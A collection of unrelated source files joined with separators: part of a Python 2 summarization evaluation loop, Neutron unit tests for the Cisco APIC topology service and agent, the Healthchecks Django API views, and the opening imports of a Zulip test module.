        # Collect all previously collected nuggets here.
        nugget_cache = set()
        # Get gold matchings for oracle.
        articles = ArticlesResource()
        all_matches = cuttsum.judgements.get_merged_dataframe()
        matches = all_matches[all_matches["query id"] == event.query_id]
        # Set up soft matching if we are using it.
        if soft_match is True:
            from cuttsum.classifiers import NuggetClassifier
            classify_nuggets = NuggetClassifier().get_classifier(event)
            if event.query_id.startswith("TS13"):
                judged = cuttsum.judgements.get_2013_updates()
                judged = judged[judged["query id"] == event.query_id]
                judged_uids = set(judged["update id"].tolist())
            else:
                # Soft matching is only wired up for the 2013 judgements.
                raise Exception("Bad corpus!")
        # Collect stats for each document here.
        stats = []
        # Aggregate summaries in summary_df.
        summary_df = []
        cum_F_of_S = 0
        all_seen_nuggets = set()
        # event_nuggets = set(matches["nugget id"].tolist())
        # total_nuggets = len(event_nuggets)
        total_updates = 0
        # Pull out articles with nuggets.
        for hour, path, si in articles.streamitem_iter(
                event, corpus, extractor):
            print hour, si.stream_id
            # Convert stream item to dataframe and add gold label nuggets.
            df = si2df(si, extractor=extractor)
            df["nuggets"] = df["update id"].apply(
                lambda x: set(
                    matches[matches["update id"] == x]["nugget id"].tolist()))
            # Perform soft nugget matching on unjudged sentences.
            if soft_match is True:
                ### NOTE BENE: geting an array of indices to index unjudged
                # sentences so I can force pandas to return a view and not a
                # copy.
                I = np.where(
                    df["update id"].apply(lambda x: x not in judged_uids))[0]
                unjudged = df[
                    df["update id"].apply(lambda x: x not in judged_uids)]
                unjudged_sents = unjudged["sent text"].tolist()
                assert len(unjudged_sents) == I.shape[0]
                df.loc[I, "nuggets"] = classify_nuggets(unjudged_sents)
            # Remove nuggets from dataframe if we have already collected them in
            # the cache. The scoring function should ignore these.
            df = df[df["nuggets"].apply(len) > 0]
            all_seen_nuggets.update(
                set(n for ns in df["nuggets"].tolist() for n in ns))
            df["nuggets"] = df["nuggets"].apply(
                lambda x: x.difference(nugget_cache))
            if len(df) == 0:
                continue
            # Run summarizer on current document and update stats about it.
            summary = system.summarize(df)
            summary_nuggets = set(n for ns in summary._df["nuggets"].tolist()
                                  for n in ns)
            nugget_cache.update(summary_nuggets)
            # Shrink the remaining budget by the number of sentences used.
            system.k -= len(summary._df)
            F_of_S = len(summary_nuggets)
            cum_F_of_S += F_of_S
            total_updates += len(summary._df)
            # Stream ids start with an epoch timestamp.
            timestamp = int(si.stream_id.split("-")[0])
            stats.append({
                "Cum. F(S)": cum_F_of_S,
                "F(S)": F_of_S,
                "UB no const.": len(all_seen_nuggets),
                "budget": budget,
                "Tot. Updates": total_updates,
                "event title": event.fs_name(),
                "timestamp": timestamp,
                "query id": event.query_id,
            })
            summary_df.append(summary._df)
            if system.k <= 0:
                print "Budget exceeded!"
                break
        output_df = pd.DataFrame(stats,
            columns=["timestamp", "query id", "event title",
                     "Cum. F(S)", "F(S)", "UB no const.",
                     "Tot. Updates", "budget",])
        # Write stats and updates to file.
        parent = os.path.dirname(output_path_prefix)
        if not os.path.exists(parent):
            os.makedirs(parent)
        stats_path = output_path_prefix + ".stats.tsv"
        updates_path = output_path_prefix + ".updates.tsv"
        with open(stats_path, "w") as f:
            output_df.to_csv(f, sep="\t", index=False)
        summary_df = pd.concat(summary_df)
        # Encode to UTF-8 bytes before writing (Python 2 str output).
        summary_df["sent text"] = summary_df["sent text"].apply(
            lambda x: x.encode("utf-8"))
        with open(updates_path, "w") as f:
            summary_df[["timestamp", "update id", "sent text"]].sort(
                ["update id"]).to_csv(f, sep="\t", index=False)
| |
# Copyright (c) 2014 Cisco Systems
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import mock
# Stub out the proprietary apicapi package BEFORE importing the driver,
# so these tests run without apicapi installed.
sys.modules["apicapi"] = mock.Mock()
from neutron.plugins.ml2.drivers.cisco.apic import apic_topology
from neutron.tests import base
from neutron.tests.unit.plugins.ml2.drivers.cisco.apic import (
base as mocked)
# Dotted import paths patched with mock in the test cases below.
NOTIFIER = ('neutron.plugins.ml2.drivers.cisco.apic.'
            'apic_topology.ApicTopologyServiceNotifierApi')
RPC_CONNECTION = 'neutron.common.rpc.Connection'
AGENTS_DB = 'neutron.db.agents_db'
PERIODIC_TASK = 'oslo_service.periodic_task'
DEV_EXISTS = 'neutron.agent.linux.ip_lib.device_exists'
IP_DEVICE = 'neutron.agent.linux.ip_lib.IPDevice'
EXECUTE = 'neutron.agent.linux.utils.execute'
# Command the agent runs to read LLDP neighbours in key=value form.
LLDP_CMD = ['lldpctl', '-f', 'keyvalue']
ETH0 = mocked.SERVICE_HOST_IFACE
# Canned lldpctl "keyvalue" output describing the service host's uplink;
# returned by the patched execute() in the agent tests.
LLDPCTL_RES = (
    'lldp.' + ETH0 + '.via=LLDP\n'
    'lldp.' + ETH0 + '.rid=1\n'
    'lldp.' + ETH0 + '.age=0 day, 20:55:54\n'
    'lldp.' + ETH0 + '.chassis.mac=' + mocked.SERVICE_HOST_MAC + '\n'
    'lldp.' + ETH0 + '.chassis.name=' + mocked.SERVICE_PEER_CHASSIS_NAME + '\n'
    'lldp.' + ETH0 + '.chassis.descr=' + mocked.SERVICE_PEER_CHASSIS + '\n'
    'lldp.' + ETH0 + '.chassis.Bridge.enabled=on\n'
    'lldp.' + ETH0 + '.chassis.Router.enabled=on\n'
    'lldp.' + ETH0 + '.port.local=' + mocked.SERVICE_PEER_PORT_LOCAL + '\n'
    'lldp.' + ETH0 + '.port.descr=' + mocked.SERVICE_PEER_PORT_DESC)
class TestCiscoApicTopologyService(base.BaseTestCase,
                                   mocked.ControllerMixin,
                                   mocked.ConfigMixin):
    """Tests for ApicTopologyService RPC setup and update_link handling."""

    def setUp(self):
        super(TestCiscoApicTopologyService, self).setUp()
        mocked.ControllerMixin.set_up_mocks(self)
        mocked.ConfigMixin.set_up_mocks(self)
        # Patch notifier
        notifier_c = mock.patch(NOTIFIER).start()
        self.notifier = mock.Mock()
        notifier_c.return_value = self.notifier
        # Patch Connection
        connection_c = mock.patch(RPC_CONNECTION).start()
        self.connection = mock.Mock()
        connection_c.return_value = self.connection
        # Patch agents db
        self.agents_db = mock.patch(AGENTS_DB).start()
        self.service = apic_topology.ApicTopologyService()
        self.service.apic_manager = mock.Mock()

    def test_init_host(self):
        self.service.init_host()
        # BUG FIX: these previously called .ensure_called_once(), which is
        # not a mock assertion method at all -- Mock() auto-creates the
        # attribute, so the old checks passed silently no matter what.
        self.assertTrue(self.connection.create_consumer.called)
        self.assertTrue(self.connection.consume_in_threads.called)

    def test_update_link_add_nopeers(self):
        # Adding a link with no known peers registers it and records it.
        self.service.peers = {}
        args = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
                mocked.SERVICE_HOST_MAC, mocked.APIC_EXT_SWITCH,
                mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
        self.service.update_link(None, *args)
        self.service.apic_manager.add_hostlink.assert_called_once_with(*args)
        self.assertEqual(args,
                         self.service.peers[(mocked.SERVICE_HOST,
                                             mocked.SERVICE_HOST_IFACE)])

    def test_update_link_add_with_peers_diff(self):
        # A changed peer is removed first, then re-added with the new info.
        args = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
                mocked.SERVICE_HOST_MAC, mocked.APIC_EXT_SWITCH,
                mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
        args_prime = args[:2] + tuple(x + '1' for x in args[2:])
        self.service.peers = {args_prime[:2]: args_prime}
        self.service.update_link(None, *args)
        self.service.apic_manager.remove_hostlink.assert_called_once_with(
            *args_prime)
        self.service.apic_manager.add_hostlink.assert_called_once_with(*args)
        self.assertEqual(
            args, self.service.peers[
                (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE)])

    def test_update_link_add_with_peers_eq(self):
        # Identical peer info should be a no-op.
        args = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
                mocked.SERVICE_HOST_MAC,
                mocked.APIC_EXT_SWITCH,
                mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
        self.service.peers = {args[:2]: args}
        self.service.update_link(None, *args)
        # FIX: this test previously made no assertions; verify the no-op.
        self.assertFalse(self.service.apic_manager.remove_hostlink.called)
        self.assertFalse(self.service.apic_manager.add_hostlink.called)

    def test_update_link_rem_with_peers(self):
        # A zero in the switch position marks the link as removed
        # (per update_link's contract -- confirm against the service).
        args = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
                mocked.SERVICE_HOST_MAC, 0,
                mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
        self.service.peers = {args[:2]: args}
        self.service.update_link(None, *args)
        self.service.apic_manager.remove_hostlink.assert_called_once_with(
            *args)
        self.assertFalse(bool(self.service.peers))

    def test_update_link_rem_no_peers(self):
        # Removing an unknown link must not raise.
        args = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
                mocked.SERVICE_HOST_MAC, 0,
                mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
        self.service.update_link(None, *args)
class TestCiscoApicTopologyAgent(base.BaseTestCase,
                                 mocked.ControllerMixin,
                                 mocked.ConfigMixin):
    """Tests for ApicTopologyAgent LLDP peer discovery and reporting."""
    def setUp(self):
        super(TestCiscoApicTopologyAgent, self).setUp()
        mocked.ControllerMixin.set_up_mocks(self)
        mocked.ConfigMixin.set_up_mocks(self)
        # Patch notifier
        notifier_c = mock.patch(NOTIFIER).start()
        self.notifier = mock.Mock()
        notifier_c.return_value = self.notifier
        # Patch device_exists
        self.dev_exists = mock.patch(DEV_EXISTS).start()
        # Patch IPDevice
        ipdev_c = mock.patch(IP_DEVICE).start()
        self.ipdev = mock.Mock()
        ipdev_c.return_value = self.ipdev
        self.ipdev.link.address = mocked.SERVICE_HOST_MAC
        # Patch execute: every shell-out returns the canned lldpctl output.
        self.execute = mock.patch(EXECUTE).start()
        self.execute.return_value = LLDPCTL_RES
        # Patch tasks
        self.periodic_task = mock.patch(PERIODIC_TASK).start()
        self.agent = apic_topology.ApicTopologyAgent()
        self.agent.host = mocked.SERVICE_HOST
        self.agent.service_agent = mock.Mock()
        self.agent.lldpcmd = LLDP_CMD
    def test_init_host_device_exists(self):
        # When the uplink device exists, init_host appends the configured
        # uplink ports to the lldpctl command line.
        self.agent.lldpcmd = None
        self.dev_exists.return_value = True
        self.agent.init_host()
        self.assertEqual(LLDP_CMD + mocked.APIC_UPLINK_PORTS,
                         self.agent.lldpcmd)
    def test_init_host_device_not_exist(self):
        # Without the device, the base lldpctl command is used unchanged.
        self.agent.lldpcmd = None
        self.dev_exists.return_value = False
        self.agent.init_host()
        self.assertEqual(LLDP_CMD, self.agent.lldpcmd)
    def test_get_peers(self):
        # _get_peers parses the canned lldpctl key=value output into peer
        # tuples keyed by interface name.
        self.agent.peers = {}
        peers = self.agent._get_peers()
        expected = [(mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
                     mocked.SERVICE_HOST_MAC, mocked.APIC_EXT_SWITCH,
                     mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)]
        self.assertEqual(expected,
                         peers[mocked.SERVICE_HOST_IFACE])
    def test_check_for_new_peers_no_peers(self):
        # A newly discovered peer is recorded and reported to the service.
        self.agent.peers = {}
        expected = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
                    mocked.SERVICE_HOST_MAC, mocked.APIC_EXT_SWITCH,
                    mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
        peers = {mocked.SERVICE_HOST_IFACE: [expected]}
        context = mock.Mock()
        with mock.patch.object(self.agent, '_get_peers',
                               return_value=peers):
            self.agent._check_for_new_peers(context)
            self.assertEqual(expected,
                self.agent.peers[mocked.SERVICE_HOST_IFACE])
            self.agent.service_agent.update_link.assert_called_once_with(
                context, *expected)
    def test_check_for_new_peers_with_peers(self):
        # A changed peer triggers an update_link report with the new info.
        expected = (mocked.SERVICE_HOST, mocked.SERVICE_HOST_IFACE,
                    mocked.SERVICE_HOST_MAC, mocked.APIC_EXT_SWITCH,
                    mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT)
        peers = {mocked.SERVICE_HOST_IFACE: [expected]}
        self.agent.peers = {mocked.SERVICE_HOST_IFACE:
                            [tuple(x + '1' for x in expected)]}
        context = mock.Mock()
        with mock.patch.object(self.agent, '_get_peers',
                               return_value=peers):
            self.agent._check_for_new_peers(context)
            self.agent.service_agent.update_link.assert_called_with(
                context, *expected)
| |
from datetime import timedelta as td
import time
from django.conf import settings
from django.db import connection
from django.http import (
HttpResponse,
HttpResponseForbidden,
HttpResponseNotFound,
HttpResponseBadRequest,
JsonResponse,
)
from django.shortcuts import get_object_or_404
from django.utils import timezone
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from hc.accounts.models import Profile
from hc.api import schemas
from hc.api.decorators import authorize, authorize_read, cors, validate_json
from hc.api.forms import FlipsFiltersForm
from hc.api.models import MAX_DELTA, Flip, Channel, Check, Notification, Ping
from hc.lib.badges import check_signature, get_badge_svg, get_badge_url
class BadChannelException(Exception):
    """Raised by _update() when a check spec references an empty, unknown,
    or ambiguous channel identifier.

    FIX: previously Exception.__init__ was never called, so str(e) was
    always "" and the message was lost everywhere except .message.
    """

    def __init__(self, message):
        super().__init__(message)
        self.message = message
@csrf_exempt
@never_cache
def ping(request, code, check=None, action="success", exitstatus=None):
    """Record a ping for a check.

    `check` can be supplied by ping_by_slug() to skip the code lookup.
    `action` defaults to "success"; a positive exitstatus forces "fail",
    and non-POST pings to a POST-only check are recorded as "ign".
    """
    if check is None:
        try:
            check = Check.objects.get(code=code)
        except Check.DoesNotExist:
            return HttpResponseNotFound("not found")
    # exitstatus comes from the URL; anything above 255 is not a valid
    # process exit status.
    if exitstatus is not None and exitstatus > 255:
        return HttpResponseBadRequest("invalid url format")
    headers = request.META
    # Behind a proxy, trust the first hop listed in X-Forwarded-For.
    remote_addr = headers.get("HTTP_X_FORWARDED_FOR", headers["REMOTE_ADDR"])
    remote_addr = remote_addr.split(",")[0]
    scheme = headers.get("HTTP_X_FORWARDED_PROTO", "http")
    method = headers["REQUEST_METHOD"]
    ua = headers.get("HTTP_USER_AGENT", "")
    # Never fail on undecodable request bodies.
    body = request.body.decode(errors="replace")
    if exitstatus is not None and exitstatus > 0:
        action = "fail"
    # A check restricted to POST ignores pings made with other methods.
    if check.methods == "POST" and method != "POST":
        action = "ign"
    check.ping(remote_addr, scheme, method, ua, body, action, exitstatus)
    response = HttpResponse("OK")
    # Pings may come from browser scripts on any origin.
    response["Access-Control-Allow-Origin"] = "*"
    return response
@csrf_exempt
def ping_by_slug(request, ping_key, slug, action="success", exitstatus=None):
    """Resolve a check by project ping key + slug and delegate to ping()."""
    # Fetch at most two rows: enough to distinguish "none" / "one" / "many".
    candidates = list(
        Check.objects.filter(slug=slug, project__ping_key=ping_key)[:2])
    if not candidates:
        return HttpResponseNotFound("not found")
    if len(candidates) > 1:
        # Two checks in the project share this slug -- refuse to guess.
        return HttpResponse("ambiguous slug", status=409)
    check = candidates[0]
    return ping(request, check.code, check, action, exitstatus)
def _lookup(project, spec):
    """Find an existing check in `project` matching the spec's "unique"
    fields, or return None (also when no unique fields were given)."""
    unique_fields = spec.get("unique", [])
    if not unique_fields:
        return None

    # Translate each requested unique field into an ORM filter.
    filters = {}
    if "name" in unique_fields:
        filters["name"] = spec.get("name")
    if "tags" in unique_fields:
        filters["tags"] = spec.get("tags")
    if "timeout" in unique_fields:
        filters["timeout"] = td(seconds=spec["timeout"])
    if "grace" in unique_fields:
        filters["grace"] = td(seconds=spec["grace"])

    return Check.objects.filter(project=project, **filters).first()
def _update(check, spec):
    """Apply a validated JSON spec to a check, saving only when something
    actually changed.

    Channel assignment is deferred to the very end, after save(), because
    the M2M relation requires the check to have a primary key.  Raises
    BadChannelException for empty, unknown or ambiguous channel ids.
    """
    # First, validate the supplied channel codes/names
    if "channels" not in spec:
        # If the channels key is not present, don't update check's channels
        new_channels = None
    elif spec["channels"] == "*":
        # "*" means "all project's channels"
        new_channels = Channel.objects.filter(project=check.project)
    elif spec.get("channels") == "":
        # "" means "empty list"
        new_channels = []
    else:
        # expect a comma-separated list of channel codes or names
        new_channels = set()
        available = list(Channel.objects.filter(project=check.project))
        for s in spec["channels"].split(","):
            if s == "":
                raise BadChannelException("empty channel identifier")
            # An identifier may match either the channel's UUID or its name.
            matches = [c for c in available if str(c.code) == s or c.name == s]
            if len(matches) == 0:
                raise BadChannelException("invalid channel identifier: %s" % s)
            elif len(matches) > 1:
                raise BadChannelException("non-unique channel identifier: %s" % s)
            new_channels.add(matches[0])
    need_save = False
    if check.pk is None:
        # Empty pk means we're inserting a new check,
        # and so do need to save() it:
        need_save = True
    if "name" in spec and check.name != spec["name"]:
        check.set_name_slug(spec["name"])
        need_save = True
    if "tags" in spec and check.tags != spec["tags"]:
        check.tags = spec["tags"]
        need_save = True
    if "desc" in spec and check.desc != spec["desc"]:
        check.desc = spec["desc"]
        need_save = True
    if "manual_resume" in spec and check.manual_resume != spec["manual_resume"]:
        check.manual_resume = spec["manual_resume"]
        need_save = True
    if "methods" in spec and check.methods != spec["methods"]:
        check.methods = spec["methods"]
        need_save = True
    # "schedule" wins over "timeout": apply timeout only when no schedule
    # was supplied in the same spec.
    if "timeout" in spec and "schedule" not in spec:
        new_timeout = td(seconds=spec["timeout"])
        if check.kind != "simple" or check.timeout != new_timeout:
            check.kind = "simple"
            check.timeout = new_timeout
            need_save = True
    if "grace" in spec:
        new_grace = td(seconds=spec["grace"])
        if check.grace != new_grace:
            check.grace = new_grace
            need_save = True
    if "schedule" in spec:
        if check.kind != "cron" or check.schedule != spec["schedule"]:
            check.kind = "cron"
            check.schedule = spec["schedule"]
            need_save = True
    if "tz" in spec and check.tz != spec["tz"]:
        check.tz = spec["tz"]
        need_save = True
    if need_save:
        # Timing fields may have changed; recompute the alert deadline.
        check.alert_after = check.going_down_after()
        check.save()
    # This needs to be done after saving the check, because of
    # the M2M relation between checks and channels:
    if new_channels is not None:
        check.channel_set.set(new_channels)
@authorize_read
def get_checks(request):
    """List the project's checks as JSON, optionally filtered by ?tag=."""
    q = Check.objects.filter(project=request.project)
    if not request.readonly:
        q = q.prefetch_related("channel_set")

    tags = set(request.GET.getlist("tag"))
    # First narrow down in SQL with a cheap substring match per tag...
    for tag in tags:
        q = q.filter(tags__contains=tag)

    # ...then apply the precise tag-set match in Python.
    checks = [
        check.to_dict(readonly=request.readonly)
        for check in q
        if not tags or check.matches_tag_set(tags)
    ]

    return JsonResponse({"checks": checks})
@validate_json(schemas.check)
@authorize
def create_check(request):
    """Create a check, or update an existing one matched via the spec's
    "unique" fields.  Returns 201 on create, 200 on update."""
    check = _lookup(request.project, request.json)
    created = check is None
    if created:
        # Enforce the account's check quota before inserting.
        if request.project.num_checks_available() <= 0:
            return HttpResponseForbidden()
        check = Check(project=request.project)

    try:
        _update(check, request.json)
    except BadChannelException as e:
        return JsonResponse({"error": e.message}, status=400)

    return JsonResponse(check.to_dict(), status=201 if created else 200)
@csrf_exempt
@cors("GET", "POST")
def checks(request):
    """Dispatch the checks collection endpoint: POST creates, GET lists."""
    if request.method != "POST":
        return get_checks(request)
    return create_check(request)
@cors("GET")
@csrf_exempt
@authorize
def channels(request):
    """List the project's notification channels as JSON."""
    dicts = [
        channel.to_dict()
        for channel in Channel.objects.filter(project=request.project)
    ]
    return JsonResponse({"channels": dicts})
@authorize_read
def get_check(request, code):
    """Return one check as JSON; 403 if it belongs to another project."""
    check = get_object_or_404(Check, code=code)
    if check.project_id == request.project.id:
        return JsonResponse(check.to_dict(readonly=request.readonly))
    return HttpResponseForbidden()
@cors("GET")
@csrf_exempt
@authorize_read
def get_check_by_unique_key(request, unique_key):
    """Look up a check by its derived unique_key.  unique_key is computed,
    not stored, so this scans the project's checks."""
    found = next(
        (
            check
            for check in Check.objects.filter(project=request.project.id)
            if check.unique_key == unique_key
        ),
        None,
    )
    if found is None:
        return HttpResponseNotFound()
    return JsonResponse(found.to_dict(readonly=request.readonly))
@validate_json(schemas.check)
@authorize
def update_check(request, code):
    """Apply the JSON spec to an existing check; 403 on cross-project use."""
    check = get_object_or_404(Check, code=code)
    if check.project_id == request.project.id:
        try:
            _update(check, request.json)
        except BadChannelException as e:
            return JsonResponse({"error": e.message}, status=400)
        return JsonResponse(check.to_dict())
    return HttpResponseForbidden()
@authorize
def delete_check(request, code):
    """Delete a check and echo back its final state."""
    check = get_object_or_404(Check, code=code)
    if check.project_id != request.project.id:
        return HttpResponseForbidden()
    # Serialize before deleting -- afterwards the row is gone.
    snapshot = check.to_dict()
    check.delete()
    return JsonResponse(snapshot)
@csrf_exempt
@cors("POST", "DELETE", "GET")
def single(request, code):
    """Dispatch the single-check endpoint by HTTP method (GET is default)."""
    handlers = {"POST": update_check, "DELETE": delete_check}
    handler = handlers.get(request.method, get_check)
    return handler(request, code)
@cors("POST")
@csrf_exempt
@validate_json()
@authorize
def pause(request, code):
    """Pause a check: clear its running state and any pending alert."""
    check = get_object_or_404(Check, code=code)
    if check.project_id != request.project.id:
        return HttpResponseForbidden()

    check.status = "paused"
    check.last_start = None
    check.alert_after = None
    check.save()

    # After pausing a check we must check if all checks are up,
    # and Profile.next_nag_date needs to be cleared out:
    check.project.update_next_nag_dates()

    return JsonResponse(check.to_dict())
@cors("GET")
@csrf_exempt
@validate_json()
@authorize
def pings(request, code):
    """Return the check's most recent pings, newest first, annotating each
    non-"start" ping with a duration when it directly follows a "start"."""
    check = get_object_or_404(Check, code=code)
    if check.project_id != request.project.id:
        return HttpResponseForbidden()
    # Look up ping log limit from account's profile.
    # There might be more pings in the database (depends on how pruning is handled)
    # but we will not return more than the limit allows.
    profile = Profile.objects.get(user__project=request.project)
    limit = profile.ping_log_limit
    # Query in descending order so we're sure to get the most recent
    # pings, regardless of the limit restriction
    pings = Ping.objects.filter(owner=check).order_by("-id")[:limit]
    # Ascending order is more convenient for calculating duration, so use reverse()
    prev, dicts = None, []
    for ping in reversed(pings):
        d = ping.to_dict()
        # Pair a completion ping with the immediately preceding "start";
        # skip implausibly long gaps (>= MAX_DELTA).
        if ping.kind != "start" and prev and prev.kind == "start":
            delta = ping.created - prev.created
            if delta < MAX_DELTA:
                d["duration"] = delta.total_seconds()
        # insert(0, ...) restores newest-first order for the response.
        dicts.insert(0, d)
        prev = ping
    return JsonResponse({"pings": dicts})
def flips(request, check):
    """Shared implementation for the flips endpoints: validate the query
    filters, apply them, and serialize the check's flips (newest first)."""
    if check.project_id != request.project.id:
        return HttpResponseForbidden()

    form = FlipsFiltersForm(request.GET)
    if not form.is_valid():
        return HttpResponseBadRequest()

    q = Flip.objects.filter(owner=check).order_by("-id")

    start = form.cleaned_data["start"]
    end = form.cleaned_data["end"]
    seconds = form.cleaned_data["seconds"]
    if start:
        q = q.filter(created__gte=start)
    if end:
        q = q.filter(created__lt=end)
    if seconds:
        # "seconds" means "within the last N seconds from now".
        q = q.filter(created__gte=timezone.now() - td(seconds=seconds))

    return JsonResponse({"flips": [flip.to_dict() for flip in q]})
@cors("GET")
@csrf_exempt
@authorize_read
def flips_by_uuid(request, code):
    """Flips for a check addressed by its UUID code."""
    return flips(request, get_object_or_404(Check, code=code))
@cors("GET")
@csrf_exempt
@authorize_read
def flips_by_unique_key(request, unique_key):
    """Flips for a check addressed by its derived unique_key.  The key is
    computed, not stored, so this scans the project's checks."""
    found = next(
        (
            check
            for check in Check.objects.filter(project=request.project.id)
            if check.unique_key == unique_key
        ),
        None,
    )
    if found is None:
        return HttpResponseNotFound()
    return flips(request, found)
@cors("GET")
@csrf_exempt
@authorize_read
def badges(request):
    """Return badge URLs for every tag used in the project, plus "*" for
    the all-checks badge, in each format and late-handling variant."""
    tags = {"*"}
    for check in Check.objects.filter(project=request.project):
        tags.update(check.tags_list())

    key = request.project.badge_key

    def urls_for(tag):
        # Plain and "3" (ignore-late) variants for each output format.
        return {
            "svg": get_badge_url(key, tag),
            "svg3": get_badge_url(key, tag, with_late=True),
            "json": get_badge_url(key, tag, fmt="json"),
            "json3": get_badge_url(key, tag, fmt="json", with_late=True),
            "shields": get_badge_url(key, tag, fmt="shields"),
            "shields3": get_badge_url(key, tag, fmt="shields", with_late=True),
        }

    return JsonResponse({"badges": {tag: urls_for(tag) for tag in tags}})
@never_cache
@cors("GET")
def badge(request, badge_key, signature, tag, fmt):
    """Render a public status badge ("svg", "json" or "shields") for a tag.

    The signature must validate against badge_key + tag; a 10-character
    signature ending in "-2" selects the variant that ignores "late".
    """
    if fmt not in ("svg", "json", "shields"):
        return HttpResponseNotFound()
    with_late = True
    if len(signature) == 10 and signature.endswith("-2"):
        with_late = False
    if not check_signature(badge_key, tag, signature):
        return HttpResponseNotFound()
    q = Check.objects.filter(project__badge_key=badge_key)
    if tag != "*":
        q = q.filter(tags__contains=tag)
        label = tag
    else:
        label = settings.MASTER_BADGE_LABEL
    status, total, grace, down = "up", 0, 0, 0
    for check in q:
        # tags__contains is only a substring match; re-check precisely.
        if tag != "*" and tag not in check.tags_list():
            continue
        total += 1
        check_status = check.get_status()
        if check_status == "down":
            down += 1
            status = "down"
            if fmt == "svg":
                # For SVG badges, we can leave the loop as soon as we
                # find the first "down"
                break
        elif check_status == "grace":
            grace += 1
            if status == "up" and with_late:
                status = "late"
    if fmt == "shields":
        # shields.io endpoint schema.
        color = "success"
        if status == "down":
            color = "critical"
        elif status == "late":
            color = "important"
        return JsonResponse(
            {"schemaVersion": 1, "label": label, "message": status, "color": color}
        )
    if fmt == "json":
        return JsonResponse(
            {"status": status, "total": total, "grace": grace, "down": down}
        )
    svg = get_badge_svg(label, status)
    return HttpResponse(svg, content_type="image/svg+xml")
@csrf_exempt
@require_POST
def notification_status(request, code):
    """Handle notification delivery status callbacks.

    Accepts generic "error"/"mark_disabled" form fields, plus Twilio's
    "MessageStatus" and "CallStatus".  Always returns HTTP 200 so the
    sender does not keep retrying.
    """
    try:
        # Accept callbacks only for notifications sent within the last hour.
        cutoff = timezone.now() - td(hours=1)
        notification = Notification.objects.get(code=code, created__gt=cutoff)
    except Notification.DoesNotExist:
        # If the notification does not exist, or is more than a hour old,
        # return HTTP 200 so the other party doesn't retry over and over again:
        return HttpResponse()

    error, mark_disabled = None, False

    # Look for "error" and "mark_disabled" keys:
    if request.POST.get("error"):
        error = request.POST["error"][:200]
        mark_disabled = request.POST.get("mark_disabled")

    # Handle "MessageStatus" key from Twilio
    if request.POST.get("MessageStatus") in ("failed", "undelivered"):
        status = request.POST["MessageStatus"]
        error = f"Delivery failed (status={status})."

    # Handle "CallStatus" key from Twilio
    if request.POST.get("CallStatus") == "failed":
        # FIX: was an f-string with no placeholders (lint F541); the
        # resulting text is unchanged.
        error = "Delivery failed (status=failed)."

    if error:
        notification.error = error
        notification.save(update_fields=["error"])

        # Record the error on the channel too, and optionally disable it.
        channel_q = Channel.objects.filter(id=notification.channel_id)
        channel_q.update(last_error=error)
        if mark_disabled:
            channel_q.update(disabled=True)

    return HttpResponse()
def metrics(request):
    """Expose internal counters as JSON; requires the X-Metrics-Key header
    to match settings.METRICS_KEY (and the key to be configured at all)."""
    configured_key = settings.METRICS_KEY
    if not configured_key:
        return HttpResponseForbidden()

    supplied_key = request.META.get("HTTP_X_METRICS_KEY")
    if supplied_key != configured_key:
        return HttpResponseForbidden()

    return JsonResponse(
        {
            "ts": int(time.time()),
            "max_ping_id": Ping.objects.values_list("id", flat=True).last(),
            "max_notification_id": Notification.objects.values_list(
                "id", flat=True).last(),
            "num_unprocessed_flips": Flip.objects.filter(
                processed__isnull=True).count(),
        }
    )
def status(request):
    """Health-check endpoint: verify the database answers a trivial query."""
    with connection.cursor() as cursor:
        cursor.execute("SELECT 1")
        cursor.fetchone()
    return HttpResponse("OK")
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from typing import Any, Callable, Optional
from django.conf import settings
from django.http import HttpRequest, HttpResponse
from django.test import TestCase
from zerver.models import (
get_client, get_realm, get_stream, get_user_profile_by_email,
Message, RealmAlias, Recipient, UserProfile
)
from zerver.lib.actions import (
apply_events,
bulk_remove_subscriptions,
do_add_alert_words,
check_add_realm_emoji,
do_add_realm_filter,
do_change_avatar_source,
do_change_default_all_public_streams,
do_change_default_events_register_stream,
do_change_default_sending_stream,
do_change_full_name,
do_change_is_admin,
do_change_stream_description,
do_change_subscription_property,
do_create_user,
do_deactivate_stream,
do_deactivate_user,
do_regenerate_api_key,
do_remove_alert_words,
do_remove_realm_emoji,
do_remove_realm_filter,
do_rename_stream,
do_add_default_stream,
do_set_muted_topics,
do_set_realm_create_stream_by_admins_only,
do_set_realm_name,
do_set_realm_restricted_to_domain,
do_set_realm_invite_required,
do_set_realm_invite_by_admins_only,
do_set_realm_message_editing,
do_set_realm_default_language,
do_set_realm_authentication_methods,
do_update_message,
do_update_pointer,
do_change_twenty_four_hour_time,
do_change_left_side_userlist,
do_change_enable_stream_desktop_notifications,
do_change_enable_stream_sounds,
do_change_enable_desktop_notifications,
do_change_enable_sounds,
do_change_enable_offline_email_notifications,
do_change_enable_offline_push_notifications,
do_change_enable_online_push_notifications,
do_change_pm_content_in_desktop_notifications,
do_change_enable_digest_emails,
do_add_realm_alias,
do_remove_realm_alias,
fetch_initial_state_data,
get_subscription
)
from zerver.lib.message import render_markdown
from zerver.lib.test_helpers import POSTRequestMock
